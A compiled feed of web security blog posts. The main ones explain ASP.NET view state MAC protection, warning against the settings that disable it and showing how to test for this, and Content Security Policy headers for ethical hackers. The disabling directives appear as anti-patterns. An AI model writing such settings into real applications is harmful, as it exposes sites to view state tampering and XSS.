But there’s one thing about view state that I suspect many people don’t know and even if they’ve messed with it before, may not understand the consequences: MAC. This is actually a very important feature of view state and misusing it can not only leave you vulnerable now but you may very well find it becomes a breaking change in future versions of ASP.NET. Let me explain what it is, why you need it and how to test whether it’s been disabled on a site.

What do Macs have to do with .NET?!

No, not Macs, MACs – Message Authentication Codes. The whole idea of a MAC is to provide assurance as to the authenticity of a message so that the recipient can have confidence that it hasn’t been tampered with. Don’t confuse this with encryption of the message; it’s not about keeping the message private, rather it’s about establishing message integrity and the concept is actually very simple.

Say you have a message on the sender’s side and in the case of this blog post, that message is your big whack of view state with data to be persisted between requests. What happens is that the message is combined with a private key then hashed to create the MAC. When the original message is then sent it’s accompanied by the MAC. The sender get the message, hashes it using the same private key as the sender (this is important as just the one key is involved on both sides), then compares the resultant MAC with the one sent alongside the original message. If they match, the message is intact and if they don't then the receiver knows that someone has been messing with it.

Wikipedia has a neat visual explanation of it:

Visual representation of MAC

The relevance of MACs to .NET and view state is simply that it provides a mechanism to ensure that an attacker hasn’t been messing with your view state. Unless you turn it off – that’s the story I really want to talk about here.

Disabling view state MAC (and why you should never, ever, ever do it)

Let’s look at how to turn it off then why you shouldn’t. There are a couple of different approaches, the first is to just disable it site-wide in the web.config:

<pages enableViewStateMac="false" />

The other is to turn it off on an individual page:

<%@ Page EnableViewStateMac="false" %>

Either of those options will put a dead stop to MAC’ing your view state, but why on earth would you ever want to do this?! A common reason would be when transferring requests between machines with different keys as unless the same one is used by both the sender and receiver, an exception will result. Disabling view state MAC hacks around the correct fix which is to simply sync the keys.

Another scenario might be to accept view state posted from third parties. There’s really not a good use case for this though and it’s a bit of an abomination of what view state was designed to do. I’m sure there are other scenarios as well where the developer has said “Hey, you know what? If we just turn off this security feature then it solves [insert random problem here]”.

So what can you do with view state turned off? Well you can send whatever the hell you want in view state! The damage an attacker can do with this depends on how the view state is used, let’s consider some possibilities:

  1. Set their own values in your controls
  2. Change control state
  3. Inject XSS into the page

Think of it like this: anything the page depends on that comes from view state could be compromised. Without MAC, the entire view state becomes “untrusted data” or in other words, expect it to contain nasties injected by an attacker. This might then be weaponised by the attacker tricking the victim into posting invalid view state (a classic social engineering attack often used with reflected XSS) or depending on the nature of the app, an attacker might directly exploit the system themself if that tampered view state is then processed by the server. There are many, many possible exploits here.

What you should be doing with view state MAC

The clearest advice I’ve seen on this is from Levi Broderick on the ASP.NET team via this Stack Overflow question (his caps – not mine):"

It should never be set to false. THERE ARE NO EXCEPTIONS TO THIS RULE.

In that response Levi also says:

The EnableViewStateMac property will be removed in a future version of the product since there is no valid reason to set it to 'false'

Levi then talks about this again in his post on Cryptographic Improvements in ASP.NET 4.5:

Never set EnableViewStateMac to false in production. Not even for a single page. No exceptions! The EnableViewStateMac switch will be removed in a future version.

But what if you’re not even using view state? What’s the harm of disabling MAC then? Barry Dorrans from the Azure team at Microsoft has this to say:

There are cases where, despite your best attempts viewstate may sneak in, under the guise of control state, so the warning still applies.

As he also says, if you’re not using it then what’s the point of disabling MAC in the first place?! There’s a bit of a theme happening here with Microsoft people telling you not to mess with the secure default.

Still not convinced? Damian Edwards (a Program Manager on the ASP.NET team) also touches on it in his talk from NDC earlier this year (20 mins and 35 secs onwards):

Do not disable MAC

Note also that Damian refers to how the EnableViewStateMac setting doesn’t just, well, enable view state MAC. Instead it also has an impact on things like control state and event validation, among others. Wait – what?! Ok, so now you’re starting to get a sense of why Damian is giving people open license to tease the ASP.NET team about ever allowing this in the first place!

He then goes on to say this:

In a future version of .NET we will remove the support for this. If you set this to false we’ll just blow your application up! It is incredibly dangerous.

Understood? Good!

Testing for disabled view state MAC with ASafaWeb

This is a perfect scenario for ASafaWeb to test for because it’s already receiving the view state from web forms apps by virtue of the fact that it’s embedded in the response to requests the tool is already making. Because the MAC is simply appended to the other data in view state it’s also easy to detect, in fact there’s an online tool that enables you to decode any view state (it’s also a good reminder why nothing sensitive should ever go into view state if you’re not making use of the viewStateEncryptionMode property and even then, storing this sort of data in there is a really, really bad idea).

Here’s how it works: Firstly, head on over to asafaweb.com and enter the URL of the site you want to scan into the extremely large text box on the home page:

Scanning a site via ASafaWeb

This one is my dedicated insecure test site and after running it you’ll get a bunch of results relating to various aspects of the site’s security profile:

An ASafaWeb scan result

Drill down into the “View State MAC” entry and you’ll see this:

Details of view state MAC address validation

That’s it! Hopefully you won’t see red and you’ll either see green for a pass or “Not tested” (usually it’s not an ASP.NET app or it’s an MVC app or view state was encrypted and can’t be tested) but if you do see red, fix it right now! For context, since I silently launched this scan a few days ago about 5% of sites where view state was present and readable had disabled MAC on the view state.

Check your sites folks!

18 Sep 11:27

Security Capabilities Comparison (HSTS & CSP) for Mobile & Desktop Browsers

by Michael Coates
11 Sep 05:01

What CSP Means for Ethical Hacking

by admin

Arrow

Application Vulnerability Assessments:

What CSP Means for Ethical Hacking

Content Security Policy (CSP) 1.1 is a specification used to control locations from where an application can load content as well as restrict insecure use of JavaScript. By blocking execution of inline JavaScript and dangerous methods such as eval(), setTimeout(), and others, exploitation of many cross-site scripting vulnerabilities can be prevented. It’s important to understand that this is in no way intended to be a first line of defense, and should never be used in place of proper input validation. However, in the event that an XSS vulnerability is introduced to an application, CSP may be able to provide a valuable layer of protection to users. CSP 1.1 is still a working draft, however is rapidly gaining traction and already in use by Google, Facebook, and Twitter.

CSP in Ethical Hacking

Many organizations rely on vulnerability assessments to provide a complete security review of their applications. In many cases, we (security professionals) are the only link between the w3c security communities and real world deployment of the technology. While raising an issue on an assessment because of a non-existent policy may not be appropriate, a note suggesting the application could benefit from it will often be well received.

Inevitably, security professionals should also expect situations where CSP is used in attempt to mitigate or lower the risk of XSS vulnerabilities. Many application owners may be tempted to use CSP in place of a costly code change. At the time of this writing it is our strong opinion that CSP is not a strong enough control to mitigate risk for XSS or any arbitrary content loading vulnerability.

Policy Delivery

The policy is delivered to the user via a ‘Content-Security-Policy’ header, however CSP 1.1 contains an experimental meta tag delivery method. Below shows an example CSP header:

Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com

This header also takes two other forms: X-Content-Security-Policy and X-WebKit-CSP. As browsers mature, ‘X-‘ prefixes and WebKit-CSP will be deprecated. For best possible support, it is recommended a policy be delivered with all three headers. Below shows an ideal response using all three variations:

Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com
X-Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com
X-WebKit-CSP: default-src 'self'; script-src 'self' cdn.example.com

Ethical hacking professionals should be aware that if CSP is in use by an application, but is not delivered on particular pages, this likely indicates an oversight by application developers and should be raised as an issue. CSP is effective on a per page basis, so it cannot prevent an XSS vulnerability if the header is not delivered on a vulnerable page.

Directives

This article will not cover all CSP directives, but we will cover some new and important features which impact many applications.

    • default-src – this specifies a default location list for all other directives. The available options are ‘none’, ‘self’, ‘all’, hostnames, URIs, and schemes (ie https). This sets the default values for all other directives. It is recommended to set a restrictive default-src value, and then set more permissive values as needed for other directives.
      script-src – Controls where script can be loaded from. Two other parameters exist for this directive which can lift the default controls on JavaScript execution.

      unsafe-inline – Overrides the default CSP restriction of inline JavaScript and allows for scripts to be executed from within <script></script> tags.

      unsafe-eval – Overrides the default restrictions of dangerous JavaScript functions such as eval(), Function, setTimeout(), and setInterval(). Use of unsafe-eval is not recommended, it is strongly advised that code rewritten in a safe manner is done before allowing dangerous functions.

      nonce-[random-value] – This is a recommended alternative to unsafe-inline. The nonce attribute should be supplied with a random value in your policy; the random value should be added as an attribute to <script></script> tags. Below shows how inline JavaScript can be allowed using this method:

    Content-Security-Policy: default-src 'self'; script-src 'nonce-Nc3n83cnSAd3wc3Sasdfn939hc3'
    […]
    <script nonce="Nc3n83cnSAd3wc3Sasdfn939hc3">
    alert("Allowed because nonce is valid.")
    </script>
    

      connect-src – Controls where Websockets, XMLHttpRequests, and Server-Sent Events can connect. This could mitigate a parameter tampering vulnerability if these functions are generated dynamically.

      reflected-xss (experimental) – This serves as a direct replacement for the X-XSS-Protection header.

    reflected-xss allow
    reflected-xss filter
    reflected-xss block

    Has the following equivalents:

    X-XSS-Protection: 0
    X-XSS-Protection: 1
    X-XSS-Protection: 1; mode=block
    
  • Support

    • Chrome – As of version 25 Chrome includes full support for CSP as well as a mandatory subset of features imposed on extensions. Mobile versions also include full unprefixed support.

      Mozilla Firefox – The experimental header has been supported since version 4, however, version 23 includes full unprefixed support. Mobile versions support X-Content-Security-Policy only.

      Safari – CSP is supported through the X-Webkit-CSP header.

      Internet Explorer – IE 10 supports (very) limited subset of CSP is supported via the X-Content-Security-Policy header.

  • In addition to governing JavaScript, CSP has a suite of directives to control where many variations of content is loaded from. This includes images, fonts, audio, video, frames and more.

    Reporting

    CSP 1.1 introduces reporting capabilities. When a violation of your policy occurs, the user’s web browser will send the violation details in JSON format to a destination of your choosing. It should be understood that this does open the door to new abuse cases and should be used with the same caution as any other functional component of your application.
    CSP can also operate in “report only” mode, where policies are not enforced, but reports of violations will still be sent to you. This can be very useful to test out a policy before deployment. CSP can be difficult to determine just how it will affect a large application. To use CSP in this mode, the policy should be delivered via the following header:

    Content-Security-Policy-Report-Only: […]
    

    Policy Generation

    Policies will often be best generated by hand, but using a generation tool will give you something to start with. Mal Curtis has a very useful CSP generation tool that can get you started quickly making a policy.

    Further reading:
    Up to date details for browser support – http://caniuse.com/contentsecuritypolicy
    HTML5 Rocks Tutorial – http://www.html5rocks.com/en/tutorials/security/content-security-policy/
    Full CSP 1.1 specification working draft – https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html

    The post What CSP Means for Ethical Hacking appeared first on Virtue Security | Ethical Hacking Services.

    11 Sep 00:28

    Why remediating assessment results might be harmful to your business

    by Ehsan Foroughi

    Let’s say you’ve just had a pen test or security scan performed on your application. You review the list of findings and get to work on remediation. Apart from obvious shortcomings of any individual single assessment technique, you may also be doing a disservice to meeting your business goals. Here’s why:

    The goal of your assessment is likely to understand open risks in your application with the goal of remediating or otherwise compensating for those risks. In most cases you only have a limited amount of developer time to fix security issues as they try to juggle building business value with new features. The problem is that by focusing remediation efforts on what a scanner or pen test finds, you are monopolizing precious developer time to fix the issues that technique can find rather than the risks that actually matter to your business.

    For example, suppose your scanner identified Missing HttpOnly cookie flag as a finding.   At the same time, your scanner was unable to find the kind of basic authorization flaws that grab international headlines, such as the ‘delete any photo on Facebook’ bug that a researcher found last week. By focusing on the scanner result, you may be spending precious developer time on the cookie flag even though the authorization issue is a much bigger risk to your organization.

    A more sensible approach is to start with identifying the risks that you care about, either through automated security requirements analysis, threat modeling, or some other technique. With risks identified, you determine which of those risks your assessment technique is capable of finding and which ones it can’t find. Use other techniques to assess the gaps, either by manual testing/code review or – if resources are tight – just asking developers if they do things like perform authorization checks on all API calls. As we’ve said before, coming up with a list of risks you care about doesn’t prevent you from looking for other kinds of vulnerabilities. It does, however, allow you to focus your efforts on the risks which can be harmful to your business since 78% of real incidents are easily preventable.

     

    10 Sep 04:35

    51% of security managers believe their applications have vulnerabilities [INFOGRAPHIC]

    by Trusted Software Alliance
    A recent study by Quotium highlighted some interesting findings as they researched application security from a security manager’s point of view. …

    Continue reading »